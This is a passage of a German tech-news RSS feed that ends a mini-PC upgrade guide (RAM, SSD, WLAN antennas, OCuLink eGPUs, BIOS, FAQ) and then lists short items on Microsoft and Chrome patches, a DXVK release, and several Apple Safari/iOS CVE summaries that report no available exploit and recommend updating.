					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Achten Sie auf die PCIe-Generation. Neue Modelle unterstützen teils PCIe 5.0, die meisten PCIe 4.0. Eine schnellere SSD läuft auch in einem langsameren Slot, dann eben gedrosselt. Ein zweiter Steckplatz lässt sich für ein reines Datenlaufwerk nutzen, ohne das System anzutasten. Wer nur ein kleindimensioniertes Laufwerk vorfindet, sichert seine Daten, klont die alte SSD vor dem Tausch oder setzt Windows neu auf.</p>



<p>Wichtig ist außerdem die Bauhöhe. In manchen Mini-PCs bleibt wenig Platz für SSDs mit hohem Kühlkörper. Oft passt nur ein dünnes Wärmeleitpad, nicht aber ein hoher SSD-Kühlkörper. Eine sehr schnelle PCIe-5.0-SSD bringt wenig, wenn sie im engen Gehäuse wegen Hitze schnell drosselt.</p>



<h2 class="wp-block-heading">Praxis-Tipp: Vorsicht bei WLAN-Antennen</h2>



<p>Beim Öffnen mancher Mini-PCs ist Vorsicht geboten. Innenliegende Metallabdeckungen führen die WLAN-Antennenkabel teils sehr knapp an der WLAN-Karte vorbei. Wer RAM oder SSD tauscht, kann beim Abheben der Abdeckung versehentlich das schwarze und graue Antennenkabel lösen. Danach funktionieren WLAN und Bluetooth nicht mehr zuverlässig oder gar nicht. In unserem Test des <a href="https://www.pcwelt.de/article/2883309/geekom-a9-max-test.html" target="_blank" rel="noreferrer noopener">Geekom A9 Max</a> zeigte sich genau dieses Risiko.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c7833cc44e"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2025/09/Test-GEEKOM-A9-Max-Antennenkabel-rotated.jpg?quality=50&amp;strip=all&amp;w=900" alt="Test GEEKOM A9 Max - Antennenkabel" class="wp-image-2894968" width="900" height="1200" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Christoph Hoffmann</p></div>



<p>Ziehen Sie Abdeckungen deshalb nie ruckartig ab. Prüfen Sie zuerst, ob Antennenkabel mit Klebestreifen fixiert sind, und lösen Sie diese vorsichtig. Falls die Kabel bereits abgezogen sind, müssen sie wieder auf die WLAN-Karte gesteckt werden: Schwarz gehört meist auf „Main“, Grau auf „AUX“. Oft sitzt die WLAN-Karte unter der M.2-SSD, sodass die SSD vorübergehend ausgebaut werden muss.</p>



<h2 class="wp-block-heading">WLAN-Modul: der Sprung auf Wi-Fi 7</h2>



<p>Das WLAN-Modul ist das unscheinbare Upgrade. In vielen Mini-PCs sitzt es als kleine M.2-2230-Karte unter einer Abdeckung und lässt sich gegen ein neueres Modell tauschen. Vor dem Kauf sollten Sie aber prüfen, ob Antennenanschlüsse, Bauform, Anbindung und Treiber passen.</p>



<p>Der Wechsel von Wi-Fi 5 oder Wi-Fi 6 auf Wi-Fi 7 bringt mehr Durchsatz und Bluetooth in aktueller Version. Spürbar wird der Nutzen aber nur, wenn auch der Router mitspielt. Für Geräte am Netzwerkkabel lohnt der Tausch kaum.</p>



<h2 class="wp-block-heading">Externe Grafikkarte: OCuLink hat Leistungsvorteile</h2>



<p>Den deutlichsten Sprung bringt eine externe Grafikkarte. Mini-PCs setzen auf integrierte Grafik, die für Office und Filme genügt, beim Spielen aber an Grenzen stößt. Eine eGPU schließt die Lücke. Sie steckt in einem Gehäuse mit eigenem Netzteil und verbindet sich per Kabel mit dem Rechner.</p>



<p>Der Anschluss entscheidet über das Ergebnis. OCuLink führt die PCIe-Leitungen direkt nach außen und verliert deshalb nur wenig Leistung. Bei PCIe 4.0 x4 stehen 64 Gbit/s zur Verfügung. Je nach Grafikkarte, Spiel, Auflösung und Dock liegt der Leistungsverlust oft grob bei 3 bis 7 Prozent.</p>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a5c7833ccbf0"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/04/Framework-Oculink-eGPU-dev-kit.png?w=1200" alt="Framework Oculink external GPU dev kit" class="wp-image-3120744" width="1200" height="900" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button></figure><p class="imageCredit">Mark Hachman / Foundry</p></div>



<p>USB4 und Thunderbolt sind flexibler, bremsen eine externe Grafikkarte aber meist stärker aus. Thunderbolt 5 und USB4 v2 bieten deutlich mehr Bandbreite als Thunderbolt 4 oder klassisches USB4, trotzdem hängt der Leistungsverlust stark von Dock, Grafikkarte, Spiel und Auflösung ab.</p>



<p>Als grobe Orientierung gilt: OCuLink liegt häufig im niedrigen einstelligen Prozentbereich, Thunderbolt 4 und USB4 können je nach Szenario deutlich mehr Leistung kosten. Ein verbreiteter Irrtum bleibt daher: Ein USB4-Port allein macht noch keinen guten eGPU-Host.</p>



<p>Ein Nachteil bleibt: OCuLink kennt kein Hot-Plug. Zum Verbinden oder Trennen muss der Rechner heruntergefahren werden. Und günstig ist das Setup nicht: Gehäuse, Grafikkarte und ein passendes Netzteil summieren sich. Wer ohnehin am Schreibtisch bleibt, fährt mit einem kompakten Desktop oft preiswerter.</p>



<h2 class="wp-block-heading">Kühlung und Wärmeleitpaste</h2>



<p>Ein Mini-PC lebt von kompakter Bauweise. Das hat seinen Preis bei der Kühlung. Wer das Gehäuse ohnehin geöffnet hat, kann die Wärmeleitpaste erneuern. Bei älteren Geräten bringt das ein paar Grad weniger und einen ruhigeren Lüfter. Ein Pflichtprogramm ist es nicht. Wer sich unsicher fühlt, lässt die Finger davon. Wer zu viel Wärmeleitpaste verwendet oder Bauteile beim Zerlegen beschädigt, schafft schnell mehr Probleme, als er löst.</p>



<h2 class="wp-block-heading">Betriebssystem und BIOS</h2>



<p>Auch ohne neue Hardware lässt sich Tempo gewinnen. Ein aktuelles BIOS behebt Fehler und gibt manchmal höhere RAM-Taktraten frei. Vor dem Update sollten Sie aber das exakte Modell prüfen, die Herstellerhinweise lesen und den Vorgang nicht bei instabiler Stromversorgung starten.</p>



<p>Wer Windows als Bremse empfindet, kann ein schlankes Linux installieren. Das weckt gerade ältere Mini-PCs neu auf. Beides kostet kein zusätzliches Geld, verlangt aber Vorbereitung und etwas Zeit.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper">

</div></figure>



<h2 class="wp-block-heading">Wo die Grenzen liegen</h2>



<p>Drei Dinge bleiben bei den meisten Mini-PCs praktisch ausgeschlossen. Der Prozessor ist verlötet und nicht zu tauschen. Die integrierte Grafik hängt am Prozessor und teilt sein Schicksal. Und die maximale RAM-Kapazität legt das Board fest, nicht der gute Wille. Wer an diese Wände stößt, steht vor der Frage nach einem neuen Gerät – nicht vor einem Upgrade.</p>



<h2 class="wp-block-heading">Was sich lohnt – und was nicht</h2>



<p>Unterm Strich zeichnet sich eine klare Rangfolge ab. Mehr RAM bringt für wenig Geld viel und bleibt der erste Griff, sofern ein Sockel verbaut ist. Eine größere oder schnellere SSD schafft Platz und Reserven. Das WLAN-Modul lohnt sich nur mit passender Gegenstelle. Eine eGPU kann den Mini-PC deutlich spieletauglicher machen, verlangt aber Anschluss, Geld und einen festen Platz. Prozessor und Grafikeinheit können nicht angerührt werden.</p>



<p>Der wichtigste Schritt steht vor dem Kauf: Wer später aufrüsten will, prüft Sockel, Steckplätze und Anschlüsse im Datenblatt. Ein Mini-PC mit zwei RAM-Slots, zusätzlichem M.2-Steckplatz und OCuLink-Port lässt viele Aufrüstoptionen offen. Ein flaches Modell mit verlötetem Speicher bleibt dagegen weitgehend auf dem Stand des ersten Tages.</p>



<div class="wp-block-idg-base-theme-faq-block faq-block"><h2 class="faq-block-title"> FAQ </h2><hr class="block-horizotal-divider">
<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">1.</span>
<h3 class="wp-block-heading"><strong>Kann man jeden Mini-PC aufrüsten?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Nein. Viele Mini-PCs erlauben den Tausch von RAM, SSD oder WLAN-Modul. Sehr flache Modelle haben den Arbeitsspeicher aber oft verlötet oder erschweren den Zugriff auf einzelne Komponenten.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">2.</span>
<h3 class="wp-block-heading"><strong>Was bringt bei Mini-PCs am meisten?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Meist lohnt zuerst mehr Arbeitsspeicher. Danach folgt eine größere oder schnellere SSD. Beides verbessert Alltagstempo, Multitasking und Reserven deutlich.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">3.</span>
<h3 class="wp-block-heading"><strong>Kann man den Prozessor tauschen?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>In der Regel nicht. Prozessor und integrierte Grafik sind bei Mini-PCs fast immer fest verlötet. Ein CPU-Upgrade ist daher praktisch ausgeschlossen.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">4.</span>
<h3 class="wp-block-heading"><strong>Ist eine externe Grafikkarte sinnvoll?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Ja, aber nur mit passendem Anschluss und realistischem Budget. OCuLink liefert meist die bessere eGPU-Leistung, USB4 und Thunderbolt sind dafür flexibler. Ein eGPU-Gehäuse, Netzteil und Grafikkarte machen das Setup aber teuer.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">5.</span>
<h3 class="wp-block-heading"><strong>Lohnt sich ein WLAN-Upgrade?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Nur, wenn auch der Router den neuen Standard unterstützt. Wer den Mini-PC per LAN-Kabel nutzt, profitiert von einem neuen WLAN-Modul kaum.</p>
</div>
</div></div>



<div class="wp-block-idg-base-theme-faq-inner-block faq-save-block"><div class="faq-save-content"><span class="faq-rank">6.</span>
<h3 class="wp-block-heading"><strong>Worauf sollte man vor dem Kauf achten?</strong></h3>



<div class="wp-block-idg-base-theme-faq-answer-block how-to-tip">
<p>Wichtig sind RAM-Slots, ein zusätzlicher M.2-Steckplatz, Platz für SSDs ohne hohen Kühlkörper, ein tauschbares WLAN-Modul und bei eGPU-Plänen ein ausgewiesener OCuLink-Anschluss.</p>
</div>
</div></div>
</div>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[SharePoint-Lücke CVE-2026-58644: CVSS 9,8 – Hacker kapern Server - ad-hoc-news.de]]></title>
<description><![CDATA[Microsoft behebt mit über 700 Patches eine Rekordzahl an Sicherheitslücken, darunter mehrere aktiv ausgenutzte Zero-Day-Schwachstellen.]]></description>
<link>https://tsecurity.de/de/3678961/windows-server/sharepoint-luecke-cve-2026-58644-cvss-98-hacker-kapern-server-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678961/windows-server/sharepoint-luecke-cve-2026-58644-cvss-98-hacker-kapern-server-ad-hoc-newsde/</guid>
<pubDate>Sun, 19 Jul 2026 08:16:07 +0200</pubDate>
<category>🪟 Windows Server</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft behebt mit über 700 Patches eine Rekordzahl an Sicherheitslücken, darunter mehrere aktiv ausgenutzte Zero-Day-Schwachstellen.]]></content:encoded>
</item>
<item>
<title><![CDATA[Cybersicherheit: Microsoft behebt 570 Schwachstellen im Juli-Patch - ad-hoc-news.de]]></title>
<description><![CDATA[Microsoft behebt im Juli 2026 so viele Schwachstellen wie nie zuvor. CISA ordnet Sofortmaßnahmen gegen aktiv ausgenutzte Zero-Days an.]]></description>
<link>https://tsecurity.de/de/3678545/it-security-nachrichten/cybersicherheit-microsoft-behebt-570-schwachstellen-im-juli-patch-ad-hoc-newsde/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678545/it-security-nachrichten/cybersicherheit-microsoft-behebt-570-schwachstellen-im-juli-patch-ad-hoc-newsde/</guid>
<pubDate>Sat, 18 Jul 2026 23:52:10 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Microsoft behebt im Juli 2026 so viele Schwachstellen wie nie zuvor. CISA ordnet Sofortmaßnahmen gegen aktiv ausgenutzte Zero-Days an.]]></content:encoded>
</item>
<item>
<title><![CDATA[Direct3D-zu-Vulkan-Layer: DXVK 3.0.2 mit Updates für Halo, Dying Light und mehr]]></title>
<description><![CDATA[Der Direct3D-zu-Vulkan-Übersetzer DXVK für Linux hat ein Update auf Version 3.0.2 erhalten. Es behebt unter anderem Fehler in Halo CE, Dying Light: The Beast und Overwatch. Zudem gibt es eine neue Umgebungsvariable, mit der sich Debug-Informationen für Fehlerberichte erfassen lassen.]]></description>
<link>https://tsecurity.de/de/3678462/it-nachrichten/direct3d-zu-vulkan-layer-dxvk-302-mit-updates-fuer-halo-dying-light-und-mehr/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3678462/it-nachrichten/direct3d-zu-vulkan-layer-dxvk-302-mit-updates-fuer-halo-dying-light-und-mehr/</guid>
<pubDate>Sat, 18 Jul 2026 21:32:10 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<img src="https://pics.computerbase.de/1/2/3/8/5/4-b4105565ae9cc938/article-640x360.a465a1fd.jpg"><p>Der Direct3D-zu-Vulkan-Übersetzer DXVK für Linux hat ein Update auf Version 3.0.2 erhalten. Es behebt unter anderem Fehler in Halo CE, Dying Light: The Beast und Overwatch. Zudem gibt es eine neue Umgebungsvariable, mit der sich Debug-Informationen für Fehlerberichte erfassen lassen.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43732 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web information disclosure (Nessus ID 327440)]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. It has been declared as problematic. The impacted element is an unknown function of the component Web Handler. Such manipulation leads to information disclosure.

This vulnerability is traded as CVE-2026-43732. The att...]]></description>
<link>https://tsecurity.de/de/3677217/sicherheitsluecken/cve-2026-43732-apple-safariiosipadosmacos-up-to-2651-web-information-disclosure-nessus-id-327440/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677217/sicherheitsluecken/cve-2026-43732-apple-safariiosipadosmacos-up-to-2651-web-information-disclosure-nessus-id-327440/</guid>
<pubDate>Sat, 18 Jul 2026 01:09:54 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. It has been declared as <a href="https://vuldb.com/kb/risk">problematic</a>. The impacted element is an unknown function of the component <em>Web Handler</em>. Such manipulation leads to information disclosure.

This vulnerability is traded as <a href="https://vuldb.com/cve/CVE-2026-43732">CVE-2026-43732</a>. The attack may be launched remotely. There is no exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43740 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web information disclosure (Nessus ID 327439)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. This vulnerability affects unknown code of the component Web Handler. Executing a manipulation can lead to information disclosure.

This vulnerability is registered as CVE-2026-437...]]></description>
<link>https://tsecurity.de/de/3677216/sicherheitsluecken/cve-2026-43740-apple-safariiosipadosmacos-up-to-2651-web-information-disclosure-nessus-id-327439/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3677216/sicherheitsluecken/cve-2026-43740-apple-safariiosipadosmacos-up-to-2651-web-information-disclosure-nessus-id-327439/</guid>
<pubDate>Sat, 18 Jul 2026 01:09:52 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. This vulnerability affects unknown code of the component <em>Web Handler</em>. Executing a manipulation can lead to information disclosure.

This vulnerability is registered as <a href="https://vuldb.com/cve/CVE-2026-43740">CVE-2026-43740</a>. It is possible to launch the attack remotely. No exploit is available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Windows 11: Neues Update verfügbar – es behebt 571 Lücken]]></title>
<description><![CDATA[Wenn dein Computer über Windows 11 läuft, solltest du das Juli-Update jetzt nicht verpassen. Es bringt nämlich über 500 Verbesserungen.]]></description>
<link>https://tsecurity.de/de/3676335/it-nachrichten/windows-11-neues-update-verfuegbar-es-behebt-571-luecken/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3676335/it-nachrichten/windows-11-neues-update-verfuegbar-es-behebt-571-luecken/</guid>
<pubDate>Fri, 17 Jul 2026 16:33:14 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Wenn dein Computer über Windows 11 läuft, solltest du das Juli-Update jetzt nicht verpassen. Es bringt nämlich über 500 Verbesserungen.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43734 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web use after free (Nessus ID 327444)]]></title>
<description><![CDATA[A vulnerability categorized as critical has been discovered in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. This impacts an unknown function of the component Web Handler. Executing a manipulation can lead to use after free.

This vulnerability is handled as CVE-2026-43734. The attack can be ...]]></description>
<link>https://tsecurity.de/de/3675897/sicherheitsluecken/cve-2026-43734-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-327444/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675897/sicherheitsluecken/cve-2026-43734-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-327444/</guid>
<pubDate>Fri, 17 Jul 2026 13:24:03 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability categorized as <a href="https://vuldb.com/kb/risk">critical</a> has been discovered in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. This impacts an unknown function of the component <em>Web Handler</em>. Executing a manipulation can lead to use after free.

This vulnerability is handled as <a href="https://vuldb.com/cve/CVE-2026-43734">CVE-2026-43734</a>. The attack can be executed remotely. There is not any exploit available.

It is advisable to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43726 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web use after free (Nessus ID 327441)]]></title>
<description><![CDATA[A vulnerability labeled as critical has been found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. Affected by this vulnerability is an unknown functionality of the component Web Handler. The manipulation results in use after free.

This vulnerability was named CVE-2026-43726. The attack may...]]></description>
<link>https://tsecurity.de/de/3675896/sicherheitsluecken/cve-2026-43726-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-327441/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675896/sicherheitsluecken/cve-2026-43726-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-327441/</guid>
<pubDate>Fri, 17 Jul 2026 13:24:02 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability labeled as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. Affected by this vulnerability is an unknown functionality of the component <em>Web Handler</em>. The manipulation results in use after free.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-43726">CVE-2026-43726</a>. The attack may be performed from remote. There is no available exploit.

The affected component should be upgraded.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43720 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web use after free (Nessus ID 327448)]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1 and classified as critical. Impacted is an unknown function of the component Web Handler. The manipulation results in use after free.

This vulnerability is reported as CVE-2026-43720. The attack can be launched remotel...]]></description>
<link>https://tsecurity.de/de/3675815/sicherheitsluecken/cve-2026-43720-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-327448/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675815/sicherheitsluecken/cve-2026-43720-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-327448/</guid>
<pubDate>Fri, 17 Jul 2026 12:53:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. Impacted is an unknown function of the component <em>Web Handler</em>. The manipulation results in use after free.

This vulnerability is reported as <a href="https://vuldb.com/cve/CVE-2026-43720">CVE-2026-43720</a>. The attack can be launched remotely. No exploit exists.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43725 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Website sandbox (Nessus ID 327446)]]></title>
<description><![CDATA[A vulnerability identified as critical has been detected in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. Affected is an unknown function of the component Website Handler. The manipulation leads to sandbox issue.

This vulnerability is uniquely identified as CVE-2026-43725. The attack is poss...]]></description>
<link>https://tsecurity.de/de/3675814/sicherheitsluecken/cve-2026-43725-apple-safariiosipadosmacos-up-to-2651-website-sandbox-nessus-id-327446/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675814/sicherheitsluecken/cve-2026-43725-apple-safariiosipadosmacos-up-to-2651-website-sandbox-nessus-id-327446/</guid>
<pubDate>Fri, 17 Jul 2026 12:53:29 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">critical</a> has been detected in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. Affected is an unknown function of the component <em>Website Handler</em>. The manipulation leads to sandbox issue.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2026-43725">CVE-2026-43725</a>. The attack is possible to be carried out remotely. No exploit exists.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[Wer Google Chrome am Desktop nutzt, muss jetzt aktiv werden]]></title>
<description><![CDATA[Neues Update für Google Chrome behebt kritische Sicherheitslücken. So bekommt ihr es.]]></description>
<link>https://tsecurity.de/de/3675671/android-tipps/wer-google-chrome-am-desktop-nutzt-muss-jetzt-aktiv-werden/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675671/android-tipps/wer-google-chrome-am-desktop-nutzt-muss-jetzt-aktiv-werden/</guid>
<pubDate>Fri, 17 Jul 2026 11:59:00 +0200</pubDate>
<category>🤖 Android Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Neues Update für Google Chrome behebt kritische Sicherheitslücken. So bekommt ihr es.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43727 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web use after free (Nessus ID 327453)]]></title>
<description><![CDATA[A vulnerability classified as critical has been found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. This vulnerability affects unknown code of the component Web Handler. Performing a manipulation results in use after free.

This vulnerability is identified as CVE-2026-43727. The attack can...]]></description>
<link>https://tsecurity.de/de/3675595/sicherheitsluecken/cve-2026-43727-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-327453/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675595/sicherheitsluecken/cve-2026-43727-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-327453/</guid>
<pubDate>Fri, 17 Jul 2026 11:25:45 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> has been found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a>. This vulnerability affects unknown code of the component <em>Web Handler</em>. Performing a manipulation results in use after free.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2026-43727">CVE-2026-43727</a>. The attack can be initiated remotely. There is not any exploit available.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43742 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web use after free (Nessus ID 327452)]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1 and classified as critical. This affects an unknown function of the component Web Handler. Such manipulation leads to use after free.

This vulnerability is documented as CVE-2026-43742. The attack can be executed remot...]]></description>
<link>https://tsecurity.de/de/3675594/sicherheitsluecken/cve-2026-43742-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-327452/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3675594/sicherheitsluecken/cve-2026-43742-apple-safariiosipadosmacos-up-to-2651-web-use-after-free-nessus-id-327452/</guid>
<pubDate>Fri, 17 Jul 2026 11:25:44 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/apple:safari">Apple Safari, iOS, iPadOS and macOS up to 26.5.1</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown function of the component <em>Web Handler</em>. Such manipulation leads to use after free.

This vulnerability is documented as <a href="https://vuldb.com/cve/CVE-2026-43742">CVE-2026-43742</a>. The attack can be executed remotely. There is not any exploit available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-43716 | Apple Safari/iOS/iPadOS/macOS up to 26.5.1 Web denial of service (Nessus ID 327461)]]></title>
<description><![CDATA[A vulnerability was found in Apple Safari, iOS, iPadOS and macOS up to 26.5.1. It has been declared as problematic. This issue affects some unknown processing of the component Web Handler. The manipulation results in denial of service.

This vulnerability is known as CVE-2026-43716. It is possibl...]]></description>
